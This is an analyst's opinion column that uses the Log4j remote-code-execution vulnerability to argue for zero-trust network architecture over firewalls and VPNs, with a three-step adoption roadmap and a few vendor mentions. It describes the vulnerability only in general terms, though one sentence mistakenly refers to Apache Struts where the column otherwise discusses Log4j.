Just a few days ago, a zero-day vulnerability (CVE-2021-44228) was discovered in the well-known Apache Log4j logging library that allowed attackers full remote code execution. The Apache Software Foundation released a patch and mitigation details allowing information technology administrators to update their software quickly.

Because Apache Struts is used so widely used in the enterprise, this flaw can allow cybercriminals to cause devastating effects on organizations for many months to come. Unfortunately, zero-day vulnerabilities are discovered all the time.

The best way to protect enterprises is by minimizing the attack surface and removing the opportunity for attackers to exploit zero-day vulnerabilities and damaging lateral movement. This is why organizations relying only on legacy firewalls or web application firewalls to protect themselves are at much greater risk of damage than ones that have adopted a true zero-trust network architecture.

For those that are still not well-versed in zero-trust architecture, the best way to think about it is that it flips the networking model around to improve security. The internet is based on the concept that everything can talk to everything, which is why it works so well. But this also means that when a network is breached, access is granted to every endpoint. Zero trust dictates that nothing can talk to anything else without being explicitly allowed, and this minimizes the “blast radius” of a breach.

I’m using the qualifier “true,” as “zero trust” has become the latest security technology to be thrown around by a number of vendors that really don’t offer zero trust. True zero trust starts with validating user identity combined with business policy enforcement based on contextual data from user, device, app and content.

It uses a proxy architecture to “hide” applications from the network and inspects all traffic. The proxy can be thought of as a “switchboard” that maps users to apps to devices, while making them undiscoverable from the internet.

Firewalls and virtual private networks can segment the network, but if the segment is breached, everything in that segment is exposed. Achieving true zero trust with firewalls and VPNs would require creating a segment per app, device and users, which would be prohibitively complex, even for small networks. Even if one could set that up initially, every time a new connected endpoint or app was added, all the segmentation rules would need to be updated.

Cloud security vendor Zscaler Inc. was an early entrant to the market and has been the most aggressive at delivering a true zero-trust model. But the industry has seen the concept embraced by a wide range of companies, even nontraditional security providers. IBM Corp. has made zero trust one of its core security services and even graphic processing unit maker Nvidia Inc. has zero trust as part of its data center strategy.

With respect to the Apache Log4j, security researchers at Alibaba Cloud discovered a zero-day vulnerability, meaning that without an emergency security update, every customer running a vulnerable version is at risk. The vulnerability allows full remote code execution, allowing full administrator access to the underlying Apache service and all data within it. To exploit this vulnerability, an attacker must first find the app itself, which it can’t do if zero trust is in place.

I’ve talked to many security pros who like the concept but are concerned about complexity, but it doesn’t have to be if it’s planned correctly. Here is a roadmap on how to adopt zero trust:

1. Minimize your attack surface and make apps invisible. Rather than using a legacy WAF-based approach, organization that leverage a security approach that make business critical applications undiscoverable to the internet effectively eliminate the attack surface and ultimately access for bad actors. When attackers cannot find an application or resource, they are unable to exploit them.
   
2. Stop lateral movement with user-to-app and app-to-app connections: A true zero-trust model directly connects users to resources through a reverse tunnel and never puts users on the corporate network. Potential lateral spread of an infection is prevented when application access doesn’t allow any network access, even if an initial foothold has been established. Furthermore, a complete zero trust model extends the same zero trust policy to public cloud workloads through segmentation, stopping lateral movement within a data center or cloud environment.
3. Detecting and blocking malicious activity: By using a zero-trust architecture that inspects all internet-bound traffic, organizations can detect and block initial exploit attempts and prevent malicious post-compromise activity, such as data exfiltration.

Businesses that want to protect themselves enterprise from zero-day vulnerabilities should stop relying on firewalls and VPNs as they were not meant for this kind threat, and embrace a true zero-trust architecture.

Zeus Kerravala is a principal analyst at ZK Research, a division of Kerravala Consulting. He wrote this column for SiliconANGLE.

Image: jarmoluk/Pixabay